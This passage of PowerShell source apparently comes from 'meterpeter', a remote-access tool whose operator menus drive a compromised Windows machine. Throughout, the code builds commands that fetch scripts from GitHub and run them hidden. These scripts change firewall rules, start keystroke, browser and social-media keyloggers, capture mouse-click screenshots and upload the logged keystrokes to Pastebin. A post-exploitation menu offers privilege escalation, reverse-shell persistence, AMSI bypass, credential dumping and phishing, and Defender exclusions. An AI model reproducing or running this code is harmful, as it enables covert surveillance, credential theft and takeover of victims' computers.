ports accepted. (Create)\" -ForegroundColor Yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Query Query 'active' firewall rules \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Create Block application\\program rule \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Delete Delete sellected firewall rule \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv:Frm> \" -NoNewline -ForeGroundColor Green;\r\n $Firewall_choise = Read-Host;\r\n If($Firewall_choise -ieq \"Query\")\r\n {\r\n Write-Host \" * Listing active firewall rules.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/SilenceDefender_ATP.ps1`\" -OutFile `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\SilenceDefender_ATP.ps1 -Action Query;Remove-Item -Path `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\" -Force\"\r\n }\r\n If($Firewall_choise -ieq \"Create\")\r\n {\r\n Write-Host \" * Create new 'Block' firewall rule.\" -ForegroundColor Green\r\n Write-Host \" => Remark: Dont use double quotes in inputs!\" -ForegroundColor Yellow\r\n \r\n Write-Host \" - The new firewall rule DisplayName: \" -ForeGroundColor Red -NoNewline;\r\n $DisplayName = Read-Host\r\n If(-not($DisplayName) -or $DisplayName -ieq $null)\r\n {\r\n $DisplayName = \"Block-Firefox\"\r\n Write-Host \" => Error: wrong input, set demo to '$DisplayName'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" - The Program to 'block' full path : \" -ForeGroundColor Red -NoNewline;\r\n $Program = Read-Host\r\n If(-not($Program) -or $Program -ieq $null)\r\n {\r\n $Program = \"$Env:ProgramFiles\\Mozilla Firefox\\firefox.exe\"\r\n Write-Host \" => Error: wrong input, set demo to 'firefox.exe'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" - The Program remote port to block : \" -NoNewline;\r\n $RemotePort = Read-Host\r\n If(-not($RemotePort) -or $RemotePort -ieq $null)\r\n {\r\n $RemotePort = \"Any\"\r\n Write-Host \" => Error: wrong input, set demo to '$RemotePort'\" -ForegroundColor Red\r\n }\r\n\r\n\r\n Write-Host \" - The Program local port to block : \" -NoNewline;\r\n $LocalPort = Read-Host\r\n If(-not($LocalPort) -or $LocalPort -ieq $null)\r\n {\r\n $LocalPort = \"Any\"\r\n Write-Host \" => Error: wrong input, set demo to '$LocalPort'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" - TCP Direction (Outbound|Inbound) : \" -NoNewline;\r\n $Direction = Read-Host\r\n If(-not($Direction) -or $Direction -ieq $null)\r\n {\r\n $Direction = \"Inbound\"\r\n Write-Host \" => Error: wrong input, set demo to '$Direction'\" -ForegroundColor Red\r\n }\r\n\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/SilenceDefender_ATP.ps1`\" -OutFile `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\SilenceDefender_ATP.ps1 -Action Create -DisplayName `\"$DisplayName`\" -Program `\"$Program`\" -LocalPort `\"$LocalPort`\" -RemotePort `\"$RemotePort`\" -Direction $Direction;Remove-Item -Path `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\" -Force\"\r\n }\r\n If($Firewall_choise -ieq \"Delete\")\r\n {\r\n Write-Host \" * Delete existing Block\\Allow firewall rule.\" -ForegroundColor Green\r\n Write-Host \" => Remark: Dont use double quotes in inputs!\" -ForegroundColor Yellow\r\n\r\n Write-Host \" - The DisplayName of the rule to delete: \" -ForeGroundColor Red -NoNewline;\r\n $DisplayName = Read-Host\r\n If(-not($DisplayName) -or $DisplayName -ieq $null)\r\n {\r\n Write-Host \"`n`n x Error: Module requires a firewall rule name.`n\" -ForegroundColor Red\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/SilenceDefender_ATP.ps1`\" -OutFile `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\SilenceDefender_ATP.ps1 -Action Delete -DisplayName `\"$DisplayName`\";Remove-Item -Path `\"`$Env:TMP\\SilenceDefender_ATP.ps1`\" -Force\" \r\n }\r\n }\r\n If($Firewall_choise -ieq \"Return\" -or $Firewall_choise -ieq \"cls\" -or $Firewall_choise -ieq \"Modules\" -or $Firewall_choise -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $Firewall_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Return\" -or $choise -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"Modules\" -or $choise -ieq \"modules\")\r\n {\r\n $Command = $Null;\r\n }\r\n $choise = $Null;\r\n $Clear = $True;\r\n }\r\n\r\n If($Command -ieq \"keylogger\")\r\n {\r\n write-host \"`n`n Description\" -ForegroundColor Yellow\r\n write-host \" This module captures screenshots of mouse-clicks Or,\"\r\n write-host \" Captures keyboard keystrokes and store them on %TMP%\"\r\n write-host \" Remark: Pastebin module requires 'Keystrokes' running\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Remark\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------\";\r\n write-host \" Mouse Start remote Mouse Logger Start record remote MouseClicks\"\r\n write-host \" Keystrokes Start\\Stop remote keylogger Start record remote keyStrokes\";\r\n write-host \" Pastebin Send keystrokes to pastebin Max of 20 pastes allowed by day\";\r\n write-host \" Browser Capture browser(s) tab title Start\\Stop\\Leak windows tab title\"\r\n write-host \" SocialMedia Capture keystrokes from FB\\Twitter Start\\Stop FB,Twitter keylogger\"\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:keyl`ogger> \" -NoNewline -ForeGroundColor Green;\r\n $choise = Read-Host;\r\n If($choise -ieq \"Browser\")\r\n {\r\n Write-Host \" - Start or Stop browser keylogger? (start|stop): \" -ForegroundColor Red -NoNewline\r\n $Exechoise = Read-Host\r\n If($Exechoise -iMatch '^(stop)$')\r\n {\r\n write-host \"\"\r\n $Command = \"If(Test-Path -Path `\"`$Env:TMP\\Browser.report`\"){`$PPID = (Get-Content -Path `\"`$Env:TMP\\Browser.report`\"|Select-String -Pattern '\\s*Process Id+\\s*:+\\s') -replace '\\s*Process Id+\\s*:+\\s','';If(`$PPID){echo `\"Stoping Process ID: `$PPID`\" `> `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\fdx.log;Remove-Item -Path `\"`$Env:TMP\\fdx.log`\" -Force;Stop-Process -Id `\"`$PPID`\" -Force;Get-Content -Path `$Env:TMP\\Browser.report;Remove-Item -Path `\"`$Env:TMP\\Browser.report`\" -Force;Remove-Item -Path `\"`$Env:TMP\\BrowserLogger.ps1`\" -Force}Else{echo `\" `> Error: fail to find keyl`oger process PID`\" `> `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\Browser.report;Remove-Item -Path `\"`$Env:TMP\\fdx.log`\" -Force;Remove-Item -Path `\"`$Env:TMP\\Browser.report`\" -Force;Remove-Item -Path `\"`$Env:TMP\\BrowserLogger.ps1`\" -Force}}Else{echo `\" NotFound: `$Env:TMP\\Browser.report`\" `> `$Env:TMP\\fdx.log;Get-Content -Path `$Env:TMP\\fdx.log;Remove-Item -Path `\"`$Env:TMP\\fdx.log`\" -Force;Remove-Item -Path `\"`$Env:TMP\\BrowserLogger.ps1`\" -Force}\"\r\n }\r\n Else\r\n {\r\n Write-Host \" - Delay time (in seconds) between captures (3): \" -NoNewline\r\n $Delay = Read-Host\r\n If($Delay -lt 3)\r\n {\r\n write-host \" => Error: wrong input, default to 3 (sec)\" -ForegroundColor Red\r\n }\r\n\r\n $StarTimer = (Get-Date -Format 'HH:mm')\r\n Write-Host \" - Schedule the capture start time? ($StarTimer|now): \" -ForeGroundColor Red -NoNewline\r\n $StartMe = Read-Host\r\n If($StartMe -NotMatch '^(\\d+\\d+:+\\d+\\d)$')\r\n {\r\n $StartMe = \"now\"\r\n }\r\n\r\n Write-Host \" - Dump installed browsers url history? (y|n) : \" -NoNewline\r\n $DumpHistory = Read-Host\r\n If($DumpHistory -Match '^(y|yes)$')\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/browserLogger.ps1`\" -OutFile `\"`$Env:TMP\\browserLogger.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file `$Env:TMP\\browserLogger.ps1 -starttime $StartMe -delay $Delay -log -history -force true`\";echo `\"`n `> Browser key`logger schedule to: [$StartMe] hours`\";echo `\" `> Logfile: `$Env:TMP\\Browser.report`\"\"\r\n }\r\n Else\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/browserLogger.ps1`\" -OutFile `\"`$Env:TMP\\browserLogger.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file `$Env:TMP\\browserLogger.ps1 -starttime $StartMe -delay $Delay -log -force true`\";echo `\"`n `> Browser keylo`gger schedule to: [$StartMe] hours`\";echo `\" `> Logfile: `$Env:TMP\\Browser.report`\"\" \r\n }\r\n }\r\n }\r\n If($choise -ieq \"SocialMedia\")\r\n {\r\n write-host \"`n 👁‍🗨 Module description 👁‍🗨\" -ForegroundColor Yellow\r\n write-host \" This module starts recording keystr`okes if facebook or twitter\"\r\n write-host \" is active on browser tab, and it stops\\resumes capture if user\"\r\n write-host \" switchs from social media to another website or closes browser.`n\"\r\n\r\n Write-Host \" - Start or Stop browser key`logger (\" -NoNewline -ForegroundColor Red\r\n Write-Host \"Start\" -NoNewline -ForegroundColor Yellow\r\n Write-Host \"|\" -NoNewline -ForegroundColor Red\r\n Write-Host \"Stop\" -NoNewline -ForegroundColor Yellow\r\n Write-Host \"): \" -NoNewline -ForegroundColor Red\r\n\r\n $ModeChoise = Read-Host\r\n If($ModeChoise -iMatch '^(Start)$')\r\n {\r\n ## module header\r\n $CurrentTime = (Get-Date -Format 'HH:mm')\r\n write-host \"`n The Run-And-LetGo function allow users to execute the module even\" -ForegroundColor DarkYellow\r\n write-host \" if target browser its closed and sends logfiles to pastebin server\" -ForegroundColor DarkYellow\r\n write-host \" if target user switchs from social media to another website (tab)`n\" -ForegroundColor DarkYellow\r\n\r\n Write-Host \" - Key`logger execution mode (\" -NoNewline -ForegroundColor Red\r\n Write-Host \"normal\" -NoNewline -ForegroundColor Yellow\r\n Write-Host \"|\" -NoNewline -ForegroundColor Red\r\n Write-Host \"LetGo\" -NoNewline -ForegroundColor Yellow\r\n Write-Host \") : \" -NoNewline -ForegroundColor Red\r\n\r\n $ModeSet = Read-Host\r\n If($ModeSet -iMatch '^(LetGo)$')\r\n {\r\n $SetMeUp = \"True\"\r\n $RawTime = (Get-Date -Format 'HH:mm')\r\n Write-Host \" - Schedule cmdlet execution at ($RawTime|now): \" -NoNewline\r\n $ForceOrNot = Read-Host\r\n If($ForceOrNot -iMatch '^(now)$')\r\n {\r\n ## meterpeter module output\r\n write-host \"`n`n [\" -ForegroundColor Green -NoNewline\r\n write-host \"$CurrentTime\" -NoNewline\r\n write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n write-host \" 💀 Starting key`logger in background!\"\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"SendToPasteBin : \" -NoNewline\r\n write-host \"$SetMeUp\" -ForegroundColor Green\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"IsBrowserActive : \" -NoNewline\r\n write-host \"by`pass\" -ForegroundColor Green\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"LoopDelayTime : \" -NoNewline\r\n write-host \"1200`n\" -ForegroundColor Green\r\n\r\n ## execute command \r\n $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -mode start -force -sendtopastebin`\"\"\r\n }\r\n Else\r\n {\r\n $SetMeUp = \"True\"\r\n If(-not($ForceOrNot -match '^(\\d+\\d+:+\\d+\\d)$'))\r\n {\r\n $ForceOrNot = \"now\"\r\n }\r\n\r\n Write-Host \" - Cmdlet delay time [Millisecons] (1700) : \" -NoNewline\r\n $LoopDelayTime = Read-Host\r\n If([string]::IsNullOrEmpty($LoopDelayTime))\r\n {\r\n $LoopDelayTime = \"1700\"\r\n }\r\n \r\n If($LoopDelayTime -match 1200)\r\n {\r\n $ColorChoise = \"Green\"\r\n }\r\n Else\r\n {\r\n $ColorChoise = \"Red\" \r\n }\r\n\r\n ## meterpeter module output\r\n write-host \"`n`n [\" -ForegroundColor Green -NoNewline\r\n write-host \"$CurrentTime\" -NoNewline\r\n write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n write-host \" 💀 Starting key`logger in background!\"\r\n write-host \" ⛑️ Schedule capture to: \" -NoNewline\r\n write-host \"$ForceOrNot\" -ForegroundColor Green -NoNewline\r\n write-host \" hours.\"\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"SendToPasteBin : \" -NoNewline\r\n write-host \"$SetMeUp\" -ForegroundColor Green\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"IsBrowserActive : \" -NoNewline\r\n write-host \"byp`ass\" -ForegroundColor Green\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"LoopDelayTime : \" -NoNewline\r\n write-host \"$LoopDelayTime`n\" -ForegroundColor $ColorChoise\r\n\r\n ## Execute command [start key`logger schedule]\r\n $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -schedule '$ForceOrNot' -mode start -delay $LoopDelayTime -force -sendtopastebin`\"\"\r\n }\r\n }\r\n Else\r\n {\r\n $SetMeUp = \"False\"\r\n $RawTime = (Get-Date -Format 'HH:mm')\r\n Write-Host \" - Schedule cmdlet execution at ($RawTime|now): \" -NoNewline\r\n $ForceOrNot = Read-Host\r\n If($ForceOrNot -iMatch '^(now)$')\r\n {\r\n ## meterpeter module output\r\n write-host \"`n`n [\" -ForegroundColor Green -NoNewline\r\n write-host \"$CurrentTime\" -NoNewline\r\n write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n write-host \" 💀 Starting key`logger in background!\"\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"SendToPasteBin : \" -NoNewline\r\n write-host \"$SetMeUp\" -ForegroundColor Red\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"IsBrowserActive : \" -NoNewline\r\n write-host \"check\" -ForegroundColor Red\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"LoopDelayTime : \" -NoNewline\r\n write-host \"1200`n\" -ForegroundColor Green\r\n\r\n ## Execute command [start key`logger normal]\r\n $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -mode start`\"\"\r\n }\r\n Else\r\n {\r\n $SetMeUp = \"False\"\r\n If(-not($ForceOrNot -match '^(\\d+\\d+:+\\d+\\d)$'))\r\n {\r\n $ForceOrNot = \"now\"\r\n }\r\n\r\n ## meterpeter module output\r\n write-host \"`n`n [\" -ForegroundColor Green -NoNewline\r\n write-host \"$CurrentTime\" -NoNewline\r\n write-host \"] 👁‍🗨 Social media key`logger 👁‍🗨\" -ForegroundColor Green\r\n\r\n write-host \" 💀 Starting key`logger in background!\"\r\n write-host \" ⛑️ Schedule capture to: \" -NoNewline\r\n write-host \"$ForceOrNot\" -ForegroundColor Green -NoNewline\r\n write-host \" hours.\"\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"SendToPasteBin : \" -NoNewline\r\n write-host \"$SetMeUp\" -ForegroundColor Red\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"IsBrowserActive : \" -NoNewline\r\n write-host \"check\" -ForegroundColor Red\r\n\r\n write-host \" 👁️ \" -ForegroundColor Green -NoNewline\r\n write-host \"LoopDelayTime : \" -NoNewline\r\n write-host \"1200`n\" -ForegroundColor Green\r\n\r\n ## Execute command [start key`logger schedule]\r\n $Command = \"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -schedule '$ForceOrNot' -mode start`\"\"\r\n } \r\n }\r\n }\r\n Else\r\n {\r\n write-host \"\"\r\n If($SetMeUp -imatch '^(True)$')\r\n {\r\n ## Execute command [stop key`logger]\r\n $Command = \"If(-not(Test-Path -Path `$Env:TMP\\met.pid)){echo `\"``n``n > Error: Social media key`logger not found in `$Env:COMPUTERNAME!``n`\" `> `$Env:TMP\\repo.log;Get-Content -Path `$Env:TMP\\repo.log;Remove-Item -Path `$Env:TMP\\repo.log -Force}Else{powershell -file `$Env:TMP\\SocialMedia.ps1 -mode stop -sendtopastebin;`$KillFirstPID = (Get-Content -Path `$Env:TMP\\met.pid);Remove-Item -Path `$Env:TMP\\met.pid -Force;Stop-Process -Id `$KillFirstPID -Force;Remove-Item `$Env:TMP\\SocialMedia.ps1 -Force}\"\r\n }\r\n Else\r\n {\r\n ## Execute command [stop key`logger]\r\n $Command = \"If(-not(Test-Path -Path `$Env:TMP\\met.pid)){echo `\"``n``n > Error: Social media key`logger not found in `$Env:COMPUTERNAME!``n`\" `> `$Env:TMP\\repo.log;Get-Content -Path `$Env:TMP\\repo.log;Remove-Item -Path `$Env:TMP\\repo.log -Force}Else{powershell -file `$Env:TMP\\SocialMedia.ps1 -mode stop;`$KillFirstPID = (Get-Content -Path `$Env:TMP\\met.pid);Remove-Item -Path `$Env:TMP\\met.pid -Force;Stop-Process -Id `$KillFirstPID -Force;Remove-Item `$Env:TMP\\SocialMedia.ps1 -Force}\"\r\n }\r\n }\r\n }\r\n If($choise -ieq \"Mouse\")\r\n {\r\n ## Random FileName generation\r\n $Rand = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 6 |%{[char]$_})\r\n $CaptureFile = \"$Env:TMP\\MouseCapture-\" + \"$Rand.zip\" ## Capture File Name\r\n Write-Host \" - Time of capture (seconds): \" -ForeGroundColor Red -NoNewline\r\n [int]$Timmer = Read-Host\r\n If([int]$Timmer -lt 10)\r\n {\r\n $Timmer = \"15\"\r\n Write-Host \" => Error: wrong input, set demo to '$Timmer'\" -ForegroundColor Red\r\n }\r\n\r\n #banner\r\n Write-Host \"`n`n Capture Timer Remote Storage\" -ForegroundColor Green\r\n Write-Host \" ------- ------ --------------\"\r\n Write-Host \" MouseClicks $Timmer(sec) %TMP%\\MouseCapture-${Rand}.zip`n\"\r\n\r\n If(Test-Path \"$Env:WINDIR\\System32\\psr.exe\")\r\n {\r\n $Command = \"Start-Process -WindowStyle hidden powershell -ArgumentList `\"psr.exe`\", `\"/start`\", `\"/output `$Env:TMP\\MouseCapture-$Rand.zip`\", `\"/sc 1`\", `\"/maxsc 100`\", `\"/gui 0;`\", `\"Start-Sleep -Seconds $Timmer;`\", `\"psr.exe /stop`\" -EA SilentlyContinue|Out-Null\"\r\n }\r\n Else\r\n {\r\n Write-Host \" => error: '$Env:WINDIR\\System32\\psr.exe' not found ..\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n }\r\n If($choise -ieq \"Keystrokes\")\r\n {\r\n Write-Host \" - Start or Stop keyst`rokes key`logger? (start|stop): \" -ForegroundColor Red -NoNewline\r\n $Exechoise = Read-Host\r\n If($Exechoise -iMatch '^(stop)$')\r\n {\r\n ## Stop recording system keys`trokes\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/keymanager.ps1`\" -OutFile `\"`$Env:TMP\\KeyManager.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\KeyManager.ps1`\" -Action 'Stop';Remove-Item -Path `\"`$Env:TMP\\KeyManager.ps1`\" -Force\"\r\n }\r\n Else\r\n {\r\n Write-Host \" - Use PS v2 to exec key`logger? (y|n): \" -ForeGroundColor Red -NoNewline\r\n $UsePS2 = Read-Host\r\n If($UsePS2 -iMatch '^(y|yes)$')\r\n {\r\n $UsePS2 = \"true\"\r\n }\r\n Else\r\n {\r\n $UsePS2 = \"false\" \r\n }\r\n\r\n ## Capture remote host keyst`rokes\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/keymanager.ps1`\" -OutFile `\"`$Env:TMP\\KeyManager.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\KeyManager.ps1`\" -Action 'Start' -UsePS2 $UsePS2;Remove-Item -Path `\"`$Env:TMP\\KeyManager.ps1`\" -Force\"\r\n }\r\n }\r\n If($choise -ieq \"PasteBin\")\r\n {\r\n write-host \"`n`n Description\" -ForegroundColor Yellow\r\n write-host \" -----------\"\r\n write-host \" This module takes the contents of keyl`ogger logfile (void.log)\"\r\n write-host \" and creates a new pastebin paste from it on the sellected account\"\r\n write-host \" each sellected time interval (120 sec) a max of 20 times (max pasts)\"\r\n write-host \" Recomended timeout: \" -NoNewline;\r\n write-host \"3600 (one paste each hour)\" -ForegroundColor Yellow -NoNewline\r\n write-host \" maxpastes: \" -NoNewline\r\n write-host \"10 (max)\" -ForegroundColor Yellow\r\n\r\n write-host \"`n`n Modules Description Remark\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------\";\r\n write-host \" Start Send keys`trokes to pastebin max of 20 pastes allowed by day\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:keyl`ogger:PasteBin> \" -NoNewline -ForeGroundColor Green;\r\n $PasteBinChoise = Read-Host;\r\n If($PasteBinChoise -ieq \"Start\")\r\n {\r\n $PasteSettings = \"True\"\r\n Write-Host \" - Input PastebinUsername : \" -ForeGroundColor Red -NoNewline\r\n $PastebinUsername = Read-Host\r\n If($PastebinUsername -eq $null)\r\n {\r\n $PasteSettings = \"False\"\r\n $PastebinUsername = \"missing pastebin acc name\"\r\n write-host \" => error: missing -PastebinUsername parameter\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n\r\n Write-Host \" - Input PastebinPassword : \" -ForeGroundColor Red -NoNewline\r\n $PastebinPassword = Read-Host\r\n If($PastebinPassword -eq $null)\r\n {\r\n $PasteSettings = \"False\"\r\n write-host \" => error: missing -PastebinPassword parameter\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n\r\n Write-Host \" - Max of pastes to create : \" -NoNewline\r\n $MaxPastes = Read-Host\r\n If(-not($MaxPastes) -or $MaxPastes -eq $null)\r\n {\r\n $MaxPastes = \"15\"\r\n write-host \" => Max value missing, defaulting to: $MaxPastes\" -ForegroundColor DarkYellow\r\n }\r\n\r\n Write-Host \" - Create past each xxx sec: \" -NoNewline\r\n $TimeOut = Read-Host\r\n If($MaxPastes -gt 1)\r\n {\r\n If($TimeOut -eq $null -or $TimeOut -lt 120)\r\n {\r\n $TimeOut = \"120\"\r\n write-host \" => TimeOut value very low, defaulting to: $TimeOut\" -ForegroundColor DarkYellow\r\n } \r\n }\r\n Else\r\n {\r\n If($TimeOut -eq $null)\r\n {\r\n $TimeOut = \"120\"\r\n write-host \" => TimeOut value missing, defaulting to: $TimeOut\" -ForegroundColor DarkYellow \r\n } \r\n }\r\n\r\n write-host \" * Send ke`ystrokes to pastebin\" -ForegroundColor Green\r\n Write-Host \"`n\" #Module Banner\r\n Write-Host \" Pastebin Username : $PastebinUsername\"\r\n If($PastebinPassword -eq $null)\r\n {\r\n Write-Host \" PasteBin password : \" -NoNewline;\r\n Write-Host \"missing parameter declaration.\" -ForegroundColor Red -BackgroundColor Black;\r\n }\r\n Else\r\n {\r\n Write-Host \" PasteBin password : \" -NoNewline;\r\n Write-Host \"*********\" -ForegroundColor Green; \r\n }\r\n Write-Host \" Max Pastes To Create : $MaxPastes (max)\"\r\n Write-Host \" Create Paste TimeOut : each $TimeOut (seconds)\"\r\n Write-Host \" Keyl`ogger File Path : `$Env:TMP\\void.log`n\"\r\n\r\n If($PasteSettings -iMatch '^(True)$')\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SendToPasteBin.ps1`\" -OutFile `\"`$Env:TMP\\SendToPasteBin.ps1`\"|Unblock-file;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File `$Env:TMP\\SendToPasteBin.ps1 -PastebinUsername $PastebinUsername -PastebinPassword $PastebinPassword -MaxPastes $MaxPastes -TimeOut $TimeOut -Egg true`\"\";\r\n }\r\n Else\r\n {\r\n $Command = $Null;\r\n }\r\n }\r\n Else\r\n {\r\n $PasteBinChoise = $null;\r\n $Command = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Return\" -or $choice -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"Modules\" -or $choise -ieq \"modules\" -or $choise -ieq \"clear\")\r\n {\r\n $Command = $Null; \r\n }\r\n }\r\n\r\n If($Command -ieq \"PostExploit\" -or $Command -ieq \"post\")\r\n {\r\n ## Post-Exploiation Modules (red-team)\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Post expl`oitation manager\"\r\n write-host \"`n`n Modules Description\" -ForegroundColor green;\r\n write-host \" ------- -----------\";\r\n write-host \" Stream Stream remote host desktop live\";\r\n write-host \" Camera Take snapshots with remote webcam\";\r\n write-host \" FindEop Search for EOP possible entry points\";\r\n write-host \" Escalate Escalate privs from UserLand to Admin\";\r\n write-host \" Persist Persist reverse tcp shell on startup\";\r\n write-host \" TimeStamp Change remote host files timestamp\";\r\n write-host \" Msstore manage applications from msstore\"\r\n write-host \" Artifacts Clean remote host activity tracks\";\r\n write-host \" HiddenDir Super\\hidden directorys manager\";\r\n write-host \" hideUser Remote hidden accounts manager\";\r\n write-host \" Passwords Dump (vault|dpapi|files|WDigest)\";\r\n write-host \" BruteAcc Brute-force user account password\";\r\n write-host \" PhishCred Promp remote user for logon creds\";\r\n write-host \" AMS`Ipatch Disable AMS1 within current process\";\r\n write-host \" Allprivs Enable all current shell privileges\";\r\n write-host \" Exclusions Manage Windows Defender exclusions\";\r\n write-host \" LockPC Lock remote host WorkStation\";\r\n write-host \" Restart Restart remote host WorkStation\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post> \" -NoNewline -ForeGroundColor Green;\r\n $choise = Read-Host;\r\n If($choise -ieq \"Msstore\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" winget command line tool enables users to list, discover, install\"\r\n write-host \" or uninstall programs in silent mode [windows 10\\11 OS versions]\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" List installed packets [local] UserLand\";\r\n write-host \" Discover search for appl msstore UserLand\";\r\n write-host \" install application from msstore UserLand\";\r\n write-host \" Uninstall application from [local] UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:Msstore> \" -NoNewline -ForeGroundColor Green;\r\n $win_choise = Read-Host;\r\n If($win_choise -ieq \"List\")\r\n {\r\n Write-Host \" * Enumerating installed programs!\" -ForegroundColor Green;write-host \"\"\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'list' -AutoDelete 'on'\"\r\n }\r\n If($win_choise -ieq \"Discover\")\r\n {\r\n $Program = Read-Host \" - Program name to search \"\r\n If(-not($Program) -or $Program -ieq $null)\r\n {\r\n $Program = \"games\"\r\n Write-Host \" => Error: wrong program, set demo to '$Program' ..\" -ForegroundColor Red\r\n } \r\n \r\n Write-Host \" * Search for '$Program' in msstore!\" -ForegroundColor Green;write-host \"\"\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'discover' -program '$Program' -AutoDelete 'on'\"\r\n 